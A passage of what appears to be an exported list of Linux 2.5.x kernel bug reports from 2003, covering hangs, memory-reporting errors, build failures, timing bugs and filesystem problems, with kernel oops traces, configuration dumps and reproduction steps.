CONFIG_CRYPTO_SHA1=m CONFIG_CRYPTO_SHA256=m CONFIG_CRYPTO_SHA512=m CONFIG_CRYPTO_DES=m CONFIG_CRYPTO_BLOWFISH=m CONFIG_CRYPTO_TWOFISH=m CONFIG_CRYPTO_SERPENT=m CONFIG_CRYPTO_AES=m CONFIG_CRYPTO_DEFLATE=m # CONFIG_CRYPTO_TEST is not set # # Library routines # CONFIG_CRC32=m CONFIG_ZLIB_INFLATE=y CONFIG_ZLIB_DEFLATE=m CONFIG_X86_BIOS_REBOOT=y Problem Description: There is a hard hang after a few days of uptime. Kernel 2.5.45 did not have this problem (I've had a few months of uptime with that version). I have recently upgraded to 2.5.69 and 2.5.70, and both lock up after a few days. (Numlock, capslock and scroll lock keys don't toggle the leds on the keyboard.) In 2.5.69 I used to be able to reproduce this problem fairly often by simply running aptitude. It would crash after a few MB of packages were downloaded, about halfway though getting a .deb from the ftp server. 2.5.70 doesn't seem to crash quite as often - but there have been no really large package downloads recently. When it hangs, no oops appears on the console, and the magic sysrq keys don't work. Even if aptitude doesn't kill the computer, it has roughly a 33% chance of surviving the night and the standard set of debian cron jobs. I have tried with himem both on and off, and it doesn't seem to make any difference. The crash happens even with no modules (ever) loaded - so those in my config can be discounted. Repeatedly compiling a kernel doesn't trigger the problem. I don't have much of an idea which subsystem could be at the cause of this problem, which is why I have filed this bug report under "other".</t>
  </si>
  <si>
    <t>2.5.72</t>
  </si>
  <si>
    <t>Incorrect NUMA memory reporting</t>
  </si>
  <si>
    <t>2003-06-17 12:52 UTC</t>
  </si>
  <si>
    <t>2003-07-18 11:53 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: 8-way P4 system, 16 GB RAM, 2 nodes, each node has 4 CPUs and 8GB physical memory Software Environment:2.5.71 stock kernel Problem Description: The NUMA memory reporting on 2.5.71 is incorrect. Let's first look at the memory information from a 2.5.69 kernel: /sys/devices/sys/node0/meminfo /sys/devices/sys/node1/meminfo gives: gives: Node 0 MemTotal: 8912896 kB ** Node 1 MemTotal: 8296448 kB Node 0 MemFree: 8223856 kB Node 1 MemFree: 8278720 kB Node 0 MemUsed: 689040 kB Node 1 MemUsed: 17728 kB Node 0 HighTotal: 8087552 kB ** Node 1 HighTotal: 8296448 kB Node 0 HighFree: 7546048 kB Node 1 HighFree: 8278720 kB Node 0 LowTotal: 825344 kB Node 1 LowTotal: 0 kB Node 0 LowFree: 677808 kB Node 1 LowFree: 0 kB The 2.5.69-mjb1 tree corrected the "Node 0 MemTotal" to ~8,3xx,xxx kB. In addition, Dave Hansen's change of spanned_pages to present_pages in mm/page_alloc.c (2.5.71) fixed the "Node 0 HighTotal". The 2.5.71 clearly has the above changes in page_alloc.c, but it gives out the following information: /sys/devices/system/node/node0/ /sys/devices/system/node/node1/ meminfo gives: meminfo gives: Node 0 MemTotal: 8912896 kB ** Node 0 MemTotal: 8912896 kB Node 0 MemFree: 8224812 kB Node 0 MemFree: 8224956 kB Node 0 MemUsed: 688084 kB Node 0 MemUsed: 687940 kB Node 0 HighTotal: 7563264 kB (Good) Node 0 HighTotal: 7563264 kB Node 0 HighFree: 7545472 kB Node 0 HighFree: 7545536 kB Node 0 LowTotal: 1349632 kB Node 0 LowTotal: 1349632 kB Node 0 LowFree: 679340 kB Node 0 LowFree: 679420 kB It is clear that Node 0 information is put under Node 1. HighTotal looks right, but MemTotal needs to be corrected. The logic to compute MemTotal in the mjb tree can correct it. Steps to reproduce: mount -t sysfs none /sys cat /sys/devices/system/node/node0/meminfo cat /sys/devices/system/node/node1/meminfo Regards, Peter Wong, IBM Linux Technology Center, Performance Team</t>
  </si>
  <si>
    <t>uptime wrong on x86-64</t>
  </si>
  <si>
    <t>2003-06-17 13:34 UTC</t>
  </si>
  <si>
    <t>2003-06-26 13:24 UTC</t>
  </si>
  <si>
    <t>Distribution: SLES8 Hardware Environment: AMD64 Melody box Software Environment: 2.5.72 Problem Description: uptime reports wrong value after booting Steps to reproduce: jstultz@elm3b31:~/linux-2.5&gt; uptime Actual result: 1:19pm up 12220 days, 20:19, 1 user, load average: 0.00, 0.00, 0.00 Expected result: 1:19pm up 15 min, 1 user, load average: 0.00, 0.01, 0.02 Additional info: jstultz@elm3b31:~/linux-2.5&gt; date +%s 1055881186 jstultz@elm3b31:~/linux-2.5&gt; cat /proc/stat | grep btime btime 1055880294 I've been unable to reproduce the problem on i386, however this has also been reported against sparc64 by Daniel Whitener. I suspect it might have something to do w/ do_posix_clock_monotonic_gettime() on these arches.</t>
  </si>
  <si>
    <t>ALSA emu10k doesn't load in 2.5.7[12]</t>
  </si>
  <si>
    <t>2003-06-17 14:46 UTC</t>
  </si>
  <si>
    <t>2004-07-17 17:18 UTC</t>
  </si>
  <si>
    <t>Distribution: custom LFS modification Hardware Environment: Dual Athlon 1800Mp, 760MP chipset, SB Live 5.1 Software Environment: gcc 3.3, glibc 2.3.2, module-init-tools 0.9.10 Problem Description: the ALSA emu10k drivers fails to load Jun 17 15:33:02 death kernel: Advanced Linux Sound Architecture Driver Version 0.9.4 (Mon Jun 09 12:01:18 2003 UTC). Jun 17 15:33:02 death kernel: request_module: failed /sbin/modprobe -- snd-card-0. error = -16 Jun 17 15:33:02 death kernel: no UART detected at 0xffff Jun 17 15:33:02 death kernel: ALSA sound/drivers/mpu401/mpu401.c:76: specify port Jun 17 15:33:02 death kernel: ALSA device list: Jun 17 15:33:02 death kernel: #0: Sound Blaster Live! (rev.10) at 0x1840, irq 19 J Steps to reproduce: I get the same error whether compiled in monolithically or as a module and whether or not support for the game port is installed. Removing the game port driver still results in the request_module: failed /sbin/modprobe -- snd-card-0. error = -16. Happens in 2.5.71 and 2.5.72</t>
  </si>
  <si>
    <t>ibmtr_cs does not compile</t>
  </si>
  <si>
    <t>2.5.71, 2.5.72</t>
  </si>
  <si>
    <t>2003-06-18 07:20 UTC</t>
  </si>
  <si>
    <t>2003-08-25 08:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sarge Hardware Environment: IBM Thinkpad 600, PCMCIA IBM TR card Problem Description: drivers/net/tokenring/ibmtr.c: In function `tok_open': drivers/net/tokenring/ibmtr.c:878: Warnung: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:478) In file included from drivers/net/pcmcia/ibmtr_cs.c:71: drivers/net/tokenring/ibmtr.c: In function `tok_close': drivers/net/tokenring/ibmtr.c:1043: Warnung: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:490) In file included from drivers/net/pcmcia/ibmtr_cs.c:71: drivers/net/tokenring/ibmtr.c: In function `cleanup_module': drivers/net/tokenring/ibmtr.c:1962: Warnung: comparison of distinct pointer types lacks a cast drivers/net/pcmcia/ibmtr_cs.c: At top level: drivers/net/pcmcia/ibmtr_cs.c:599: error: redefinition of `init_module' drivers/net/tokenring/ibmtr.c:1921: error: `init_module' previously defined here drivers/net/pcmcia/ibmtr_cs.c:600: error: redefinition of `cleanup_module' drivers/net/tokenring/ibmtr.c:1953: error: `cleanup_module' previously defined here make[3]: *** [drivers/net/pcmcia/ibmtr_cs.o] Fehler 1 make[2]: *** [drivers/net/pcmcia] Fehler 2 make[1]: *** [drivers/net] Fehler 2 make: *** [drivers] Fehler 2 The following patch makes it compile, but I doubt it will work. I do have only intermittend access to a TR network: --- linux-2.5.72/drivers/net/pcmcia/ibmtr_cs.c.jh 2003-06-17 12:13:34.000000000 +0200 +++ linux-2.5.72/drivers/net/pcmcia/ibmtr_cs.c 2003-06-17 12:14:24.000000000 +0200 @@ -596,5 +596,7 @@ ibmtr_detach(dev_list); } +/* module_init(init_ibmtr_cs); module_exit(exit_ibmtr_cs); +*/</t>
  </si>
  <si>
    <t>System time runs too fast.</t>
  </si>
  <si>
    <t>2003-06-18 07:25 UTC</t>
  </si>
  <si>
    <t>Ivan Aliashkevich</t>
  </si>
  <si>
    <t>2003-07-25 05:50 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Notebook Maxdata Eco 3000X Processor: P4 2Gz Chipset: SIS650 Software Environment: RedHat 8.0 + kernel 2.5.70 RedHat 9.0 + kernel 2.5.72 kernels were built by gcc 3.2.3 using default .config from arch/i386 Problem Description: System time runs at least twice faster than necessary. As a result have problems with keyboard timings: very short delay before repeat mode and very fast repeat rate problems with mouse: very fast double-click speed Steps to reproduce: buld, install kernel and restart :)</t>
  </si>
  <si>
    <t>ltp ajdtimex failures</t>
  </si>
  <si>
    <t>2003-06-18 18:34 UTC</t>
  </si>
  <si>
    <t>2003-06-23 14:10 UTC</t>
  </si>
  <si>
    <t>Distribution: SUSE Hardware Environment: AMD64/i386 Software Environment: ltp-full-20030606 Problem Description: ltp adjtimex01 and adjtimex02 tests fail. Steps to reproduce: Boot a 2.5.72 kernel Run ltp The problem is related to some time cleanups that went in recently. TICK_USEC has been changed to be based off of TICK_NSEC which is ACTHZ based. However TICK_USEC should be USER_HZ based. The kernel rejects adjtimex changes to timex.tick (tick_usec) if the value is outside 9,000-&gt;11,000 usecs per tick (USER_HZ=100), however now TICK_USEC is ACTHZ based, adjtimex is returning timex.tick values ~1,000 usecs per tick (HZ=1000). Currently working with George Anzinger and Eric Piel to resolve this issue.</t>
  </si>
  <si>
    <t>kernel-2.5.72 could not be booted.</t>
  </si>
  <si>
    <t>2003-06-19 12:15 UTC</t>
  </si>
  <si>
    <t>2010-05-05 03:28 UTC</t>
  </si>
  <si>
    <t>Distribution:RedHat Linux 8.0 (psyche) Hardware Environment:IBM x440, 8.0GB RAM, Intel Xeon 1.6GHz processors, 4-way Software Environment: 2.5.70 Problem Description: The system was running on Linux kernel-2.5.70. Compile the 2.5.72 (pulled from kernel.org). Made the necessory changes to lilo.conf so that 2.5.72 will be the default kernel. During the boot time the server could not be booted and the display dumped the following message: NMI Watchdog detected LOCKUP on CPU1, eip c0112bf2, regsiters: CPU: 1 EIP: 0060:[&lt;c0112bf2&gt;] Not tainted EFLAGS: 00000082 EIP is at ipi_handler+0x54/0x6e eax: c0142cf8 ebx: f7f93f64 ecx: 000002ff edx: 00000000 esi: 00000086 edi: f7f90000 ebp: c0106ece esp: f7f91f50 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=f7f90000 task=f7f95310) Stack: 00000002 00000001 c058c084 f7f91f7c f7f90000 00000000 c0116392 f7f93f64 c0106ece f7f90000 c0109e6a c0106ece 00000a00 f7f90000 f7f90000 f7f90000 c0106ece 00000000 0000007b fffffffb c0106ef8 00000060 00000246 Call Trace: [&lt;c0116392&gt;] smp_call_function_interrupt+0x44/0x8c [&lt;c0106ece&gt;] default_idle+0x0/0x2e [&lt;c0109e6a&gt;] call_function_interrupt+0x1a/0x20 [&lt;c0106ece&gt;] default_idle+0x0/0x2e [&lt;c0106ece&gt;] default_idle+0x0/0x2e [&lt;c0106ef8&gt;] default_idle+0x2a/0x2e [&lt;c0106f6f&gt;] cpu_idle+0x39/0x42 [&lt;c0121250&gt;] printk+0x1b4/0x258 Code: 8b 43 04 85 c0 75 f7 56 9d 83 c4 10 5b 5e c3 a1 24 54 49 c0 console shuts up ... Following is the contents of lilo.conf file: prompt timeout=50 default=linux-2.5.72 boot=/dev/sda map=/boot/map install=/boot/boot.b message=/boot/message linear image=/boot/vmlinuz-2.5.72 label=linux-2.5.72 read-only root=/dev/sda3 append="nmi_watchdog=1" image=/boot/vmlinuz-2.5.70 label=linux-2.5.70 read-only root=/dev/sda3 append="nmi_watchdog=1" image=/boot/vmlinuz-2.4.18-14bigmem label=linux initrd=/boot/initrd-2.4.18-14bigmem.img read-only append="root=LABEL=/" image=/boot/vmlinuz-2.4.18-14smp label=linux-smp initrd=/boot/initrd-2.4.18-14smp.img read-only append="root=LABEL=/" The config file that was used will be in the form of an attachment. Steps to reproduce: (1) Install RedHat Linux 8.0 (psyche). (2) Download kernel 2.5.70 from kernel.org. Compile and configure the 2.5.70 kernel and reboot with 2.5.70 as the default kernel.(3) Download kernel 2.5.72 from kernel.org. (Make sure the server is running on 2.5.70). Compile and copy the System.map and bzImage to the /boot directory. Modify the lilo.conf so that 2.5.72 is the default kernel. Also make sure the "nmi_watchdog=1" in the lilo.conf for 2.5.72. (lilo.conf file is shown in the above.) (4) execute the command: reboot</t>
  </si>
  <si>
    <t>2.5.75</t>
  </si>
  <si>
    <t>defragmentation (apparently xfs_swapext()) fills files with 0s</t>
  </si>
  <si>
    <t>XFS</t>
  </si>
  <si>
    <t>2.5.72-bk3</t>
  </si>
  <si>
    <t>2003-06-20 09:49 UTC</t>
  </si>
  <si>
    <t>2003-11-03 12:47 UTC</t>
  </si>
  <si>
    <t>XFS Guru</t>
  </si>
  <si>
    <t>Distribution: debian/sid Hardware Environment: i686 (AMD Athlon) Software Environment: Linux, gcc 2.95/3.3 Problem Description: When defragmenting a filesystem with xfs_fsr, any files that are operated on have their contents silently and completely trashed (filled with 0s.) The actual problem may not lie in xfs_swapext, but the problem manifests itself after xfs_swapext is called. To aid debugging, this is approximately what xfs_fsr does (from my observations): 1) Creates a temporary file in /.fsr 2) Unlinks the file 3) Copies data from the original file into the temporary file 4) Swaps the extents (maybe writes to unlinked files are being NOPed?) Reproduced in: 2.5.70 compiled with gcc 2.95.4 2.5.72-bk3 compiled with gcc 3.3 Unable to reproduce in: 2.4.21-rc7-xfs compiled with gcc 2.95.4 Steps to reproduce (as superuser): md5sum /path/to/fragmented_file xfs_fsr -v /path/to/fragmented_file md5sum /path/to/fragmented_file If you're having trouble finding a fragmented file to blow away, I've found the easiest way to make one is: cp /path/to/largefile /tmp/frag1 &amp; cp /path/to/largefile /tmp/frag2 (n.b. don't use a file full of 0s for this, since you won't be able to tell that the data was thrashed!)</t>
  </si>
  <si>
    <t>SETI@Home becomes unkillable</t>
  </si>
  <si>
    <t>2003-06-20 11:05 UTC</t>
  </si>
  <si>
    <t>adam</t>
  </si>
  <si>
    <t>2003-07-01 13:19 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Athlon XP 2000+, MSI KT4V mainboard, 256MB PC2700 RAM, Software Environment: Gentoo Linux, KDE 3.1.2, SETI@Home 3.08 Problem Description: After running for a while, I am unable to kill the SETI@Home process, which causes my computer to not shutdown properly because it cannot unmount my filesystems, I've also notices that in GKrellm2, after a while the nice CPU usage graph drops to 0, and the system CPU usage graph goes up to 100%, once this happens, I am unable to kill the SETI@Home process Steps to reproduce: Run SETI@Home for a few hours and then try to kill it</t>
  </si>
  <si>
    <t>drivers_other</t>
  </si>
  <si>
    <t>Missing TI PCI1520 ID</t>
  </si>
  <si>
    <t>2003-06-24 09:59 UTC</t>
  </si>
  <si>
    <t>Dustin McIntire</t>
  </si>
  <si>
    <t>2003-06-27 16:19 UTC</t>
  </si>
  <si>
    <t>Distribution: 2.5.70 Hardware Environment: Any Software Environment: Any Problem Description: The pci_ids.h file is missing a description for the Texas Instruments PCI1520 cardbus controller. --- linux-2.5.70/include/linux/pci_ids.h 2003-05-26 18:00:38.000000000 -0700 +++ linux-2.5/include/linux/pci_ids.h 2003-06-24 07:22:48.000000000 -0700 @@ -670,6 +670,7 @@ #define PCI_DEVICE_ID_TI_4410 0xac41 #define PCI_DEVICE_ID_TI_4451 0xac42 #define PCI_DEVICE_ID_TI_1420 0xac51 +#define PCI_DEVICE_ID_TI_1520 0xac55 #define PCI_VENDOR_ID_SONY 0x104d #define PCI_DEVICE_ID_SONY_CXD3222 0x8039 Steps to reproduce:</t>
  </si>
  <si>
    <t>memory leak problem found while running filesystem tests on 2.5.73-mm1 kernel</t>
  </si>
  <si>
    <t>2.5.73-mm1</t>
  </si>
  <si>
    <t>2003-06-24 19:21 UTC</t>
  </si>
  <si>
    <t>2003-07-14 14:24 UTC</t>
  </si>
  <si>
    <t>Distribution:RedHat 8.0 Hardware Environment:8 way PIII 700MHz, 4G memory Software Environment: Problem Description: When I run some fsx tests on data=journal mode ext3 filesystems, the system hang there after it happily run for about 1 or 2 hours. Andrew has already warned me that there is memory leak problem, now I got it. Report here to keep track of this problem. Not sure if this is just data=journal mode related. I have the stack info attached as well as the memory dump info after the system hang.The memory dump shows there is little free memory left. Steps to reproduce: 1.boot the kernel 2.mount many ext3 filesystems with data=journal mode 3.run fsx test on each filesystem, as following ./fsx -R -W -r 4096 -w 4096</t>
  </si>
  <si>
    <t>with PCI hot plugable option disabled doesn't compile anymore</t>
  </si>
  <si>
    <t>2003-06-26 04:04 UTC</t>
  </si>
  <si>
    <t>Claudiu Cismaru</t>
  </si>
  <si>
    <t>2003-06-26 07:33 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware Linux 9.0 Hardware Environment: Pentium 4 Software Environment: Problem Description: When deactivate PCI Hot Plugable option (CONFIG_HOTPLUG), at compiles it gives: drivers/built-in.o(.text+0x2e4f): In function `pci_remove_bus_device': : undefined reference to `pci_destroy_dev' make: *** [vmlinux] Error 1 I've took a look at the code (i've found it in drivers/pci/hotplug.c) and I've made a diff with 2.5.72. There is a new function added and deleted some part of code (which has been moved to function). But the function (pci_destroy_dev) is defined under #ifdef CONFIG_HOTPLUG "then" branch and is used on else branch, also. A fix is to move this function out of the #ifdef CONFIG_HOTPLUG directive or to define it again under the else branch of the directive. Steps to reproduce: At make [menu]config, deactivate "Support for hot-pluggable devices"</t>
  </si>
  <si>
    <t>tiobench 16threads hangs on ext2</t>
  </si>
  <si>
    <t>2.5.73-mjb2</t>
  </si>
  <si>
    <t>2003-06-27 15:53 UTC</t>
  </si>
  <si>
    <t>2003-07-07 08:50 UTC</t>
  </si>
  <si>
    <t>Distribution:SLES + 2.5.73-mjb2 Hardware Environment:8500R 8way with aic7xxx hard drive Problem Description: Nightly regression run of tiobench fails on ext2 with processes going defunct. tiotest Z F7FFEAA0 4085455440 5402 5352 5406 5398 (L-TLB) e55d9f90 00000046 f1da60a0 f7ffeaa0 f1da6100 f7f9f900 c012326a f1da60a0 00000021 00000000 e55d8000 fffdde79 00000000 c050c2a0 f1da60a0 f71e2660 f7ffeaa0 f1da60a0 00000000 c0123a1d f1da60a0 c6694340 00000000 015ffadc Call Trace: [&lt;c012326a&gt;] exit_notify+0x26a/0x750 [&lt;c0123a1d&gt;] do_exit+0x2cd/0x360 [&lt;c0123ae3&gt;] sys_exit+0x13/0x20 [&lt;c010b0cf&gt;] syscall_call+0x7/0xb Steps to reproduce: tiobench --dir /mnt/tmp --block 4096 --size 600 --numruns 10 --threads 16 where /mnt/tmp is a mounted ext2 filesystem</t>
  </si>
  <si>
    <t>itimer resolution and rounding vs posix</t>
  </si>
  <si>
    <t>2003-06-30 14:13 UTC</t>
  </si>
  <si>
    <t>2004-07-17 17:23 UTC</t>
  </si>
  <si>
    <t>1003.1-2003 sez: # Implementations may place limitations on the granularity of timer values. # For each interval timer, if the requested timer value requires a finer # granularity than the implementation supports, the actual timer value shall # be rounded up to the next supported value. thus the attached test program must not abort. It succeeds with the i686 RH9 kernel (though I don't know how modified that is), and fails with the standard 2.5.73 kernel. The implementation of timeval_to_jiffies used by getitimer/setitimer clearly truncates, though it does try to do something odd wrt TICK_NSEC.</t>
  </si>
  <si>
    <t>cat /proc/buddyinfo + netstat -a kills machine</t>
  </si>
  <si>
    <t>2.5.73-bk10</t>
  </si>
  <si>
    <t>2003-07-02 08:56 UTC</t>
  </si>
  <si>
    <t>2003-07-11 13:22 UTC</t>
  </si>
  <si>
    <t>Distribution:SLES Hardware Environment:8way 900Mhz PIII Problem Description: on 2.5.73-bk10 as well as 2.5.73-mm3, issuing netsta -a followed by cat /proc/buddy infor causes segfaults and locks up the system. Repeated issuing of netstat -a prodices the following trap: Unable to handle kernel paging request at virtual address 00c1a000 printing eip: c01405ed *pde = 00000000 Oops: 0000 [#1] CPU: 1 EIP: 0060:[&lt;c01405ed&gt;] Not tainted EFLAGS: 00010086 EIP is at kfree+0x3d/0x70 eax: 00000001 ebx: 00c1a000 ecx: f65b85c0 edx: c19f6009 esi: 00000100 edi: 00000206 ebp: f57c9720 esp: f5b13f4c ds: 007b es: 007b ss: 0068 Process netstat (pid: 2545, threadinfo=f5b12000 task=f58bb960) Stack: f68fd438 00000000 f68fd420 f65b85c0 f6caead0 c0173fd5 00000100 f65b85c0 f65b85c0 f7fdeb60 f6caead0 c0156c21 f6caead0 f65b85c0 f65b85c0 0805f038 f6aaf440 00000000 c01552a9 f65b85c0 f6aaf440 f65b85c0 0805f038 0805f038 Call Trace: [&lt;c0173fd5&gt;] seq_release_private+0x25/0x48 [&lt;c0156c21&gt;] __fput+0xb1/0xc0 [&lt;c01552a9&gt;] filp_close+0x99/0xd0 [&lt;c015533e&gt;] sys_close+0x5e/0x80 [&lt;c010afdf&gt;] syscall_call+0x7/0xb Cating of /proc/buddy info produces: &lt;1&gt;Unable to handle kernel paging request at virtual address 08c19ec0 printing eip: c013d5e0 *pde = 00000000 Oops: 0000 [#2] CPU: 0 EIP: 0060:[&lt;c013d5e0&gt;] Not tainted EFLAGS: 00010006 EIP is at frag_show+0xd0/0x140 eax: 08c19ec0 ebx: c047e3f8 ecx: 08c19ec0 edx: c19f6009 esi: 000006b7 edi: c047e1f8 ebp: c047e3f8 esp: f60b7f0c ds: 007b es: 007b ss: 0068 Process cat (pid: 5355, threadinfo=f60b6000 task=f52aa0c0) Stack: f68fd520 c041caa6 00000000 c041ca07 00000078 00000000 00000206 c047e180 c047c980 f68fd520 c047c980 00000000 c01737a2 f68fd520 c047c980 00002000 f68fd538 00000000 c014a082 f6ba1dc0 00000000 00000000 00000000 c66d5a20 Call Trace: [&lt;c01737a2&gt;] seq_read+0x102/0x300 [&lt;c014a082&gt;] do_brk+0x142/0x220 [&lt;c0155b4e&gt;] vfs_read+0xbe/0x130 [&lt;c0155df2&gt;] sys_read+0x42/0x70 [&lt;c010afdf&gt;] syscall_call+0x7/0xb Code: 8b 01 89 ca 46 89 c1 0f 18 00 90 39 da 75 f1 c7 44 24 04 a6 /autobench/scripts/getsysinfo: line 133: 5355 Segmentation fault cat /proc/buddyinfo &gt; $2/proc/buddyinfo.$1$RUN_SUFFIX Steps to reproduce: run netstat -a a few times until it traps. then cat /proc/buddyinfo and hte system will be locked up.</t>
  </si>
  <si>
    <t>BUG at fs/jfs/namei.c:492 assert(!test_cflag(COMMIT_Nolink, ip))</t>
  </si>
  <si>
    <t>2003-07-02 12:09 UTC</t>
  </si>
  <si>
    <t>2003-10-30 07:37 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 8.0 Hardware Environment: --------------------- # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 10 model name : Pentium III (Cascades) stepping : 1 cpu MHz : 702.267 cache size : 1024 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 1380.35 # cat /proc/meminfo MemTotal: 4306492 kB MemFree: 5564 kB Buffers: 384620 kB Cached: 3615820 kB SwapCached: 0 kB Active: 463532 kB Inactive: 3543660 kB HighTotal: 3440612 kB HighFree: 1280 kB LowTotal: 865880 kB LowFree: 4284 kB SwapTotal: 2097136 kB SwapFree: 2097136 kB Dirty: 56052 kB Writeback: 0 kB Mapped: 10548 kB Slab: 215456 kB Committed_AS: 22476 kB PageTables: 364 kB VmallocTotal: 114680 kB VmallocUsed: 2184 kB VmallocChunk: 112496 kB # mount /dev/sda3 on / type ext2 (rw) proc on /proc type proc (rw) devpts on /dev/pts type devpts (rw) /dev/sda1 on /boot type ext2 (rw) /dev/sdb1 on /nfsserver/ext3 type ext3 (rw) /dev/sdc1 on /nfsserver/jfs type jfs (rw) /dev/sdd1 on /nfsserver/reiserfs type reiserfs (rw) usbdevfs on /proc/bus/usb type usbdevfs (rw) Software Environment: # sh ./ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux vega 2.5.73 #3 SMP Mon Jun 23 16:18:55 CDT 2003 i686 unknown Gnu C 2.95.3 Gnu make 3.79.1 util-linux 2.11n mount 2.11z module-init-tools 2.4.12 e2fsprogs 1.26 jfsutils 1.0.15 xfsprogs 2.0.0 PPP 2.4.1 isdn4k-utils 3.1pre4 Linux C Library x 1 root root 1394238 Mar 23 2002 /lib/libc.so.6 Dynamic linker (ldd) 2.2.5 Procps 2.0.7 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0 CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=y CONFIG_SND_SEQUENCER=y # CONFIG_SND_SEQ_DUMMY is not set CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_SEQUENCER_OSS=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # # CONFIG_SND_DUMMY is not set # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # ISA devices # # CONFIG_SND_AD1848 is not set # CONFIG_SND_CS4231 is not set # CONFIG_SND_CS4232 is not set # CONFIG_SND_CS4236 is not set # CONFIG_SND_ES1688 is not set # CONFIG_SND_ES18XX is not set # CONFIG_SND_GUSCLASSIC is not set # CONFIG_SND_GUSEXTREME is not set # CONFIG_SND_GUSMAX is not set # CONFIG_SND_INTERWAVE is not set # CONFIG_SND_INTERWAVE_STB is not set # CONFIG_SND_OPTI92X_AD1848 is not set # CONFIG_SND_OPTI92X_CS4231 is not set # CONFIG_SND_OPTI93X is not set # CONFIG_SND_SB8 is not set # CONFIG_SND_SB16 is not set # CONFIG_SND_SBAWE is not set # CONFIG_SND_WAVEFRONT is not set # CONFIG_SND_CMI8330 is not set # CONFIG_SND_OPL3SA2 is not set # CONFIG_SND_SGALAXY is not set # CONFIG_SND_SSCAPE is not set # # PCI devices # # CONFIG_SND_ALI5451 is not set # CONFIG_SND_AZT3328 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_EMU10K1 is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set CONFIG_SND_INTEL8X0=y # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_VIA82XX is not set # CONFIG_SND_VX222 is not set # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # PCMCIA devices # # CONFIG_SND_VXPOCKET is not set # CONFIG_SND_VXP440 is not set # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB=y # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y CONFIG_USB_BANDWIDTH=y # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=y # CONFIG_USB_OHCI_HCD is not set CONFIG_USB_UHCI_HCD=y # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set CONFIG_USB_STORAGE=y # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_DATAFAB is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # CONFIG_USB_STORAGE_HP8200e is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # # USB Human Interface Devices (HID) # # CONFIG_USB_HID is not set # # USB HID Boot Protocol drivers # # CONFIG_USB_KBD is not set # CONFIG_USB_MOUSE is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_SCANNER is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_AX8817X is not set # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_TEST is not set # CONFIG_USB_GADGET is not set # # Bluetooth support # # CONFIG_BT is not set # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # CONFIG_DEBUG_KERNEL=y CONFIG_DEBUG_STACKOVERFLOW=y CONFIG_DEBUG_SLAB=y # CONFIG_DEBUG_IOVIRT is not set CONFIG_MAGIC_SYSRQ=y # CONFIG_DEBUG_SPINLOCK is not set 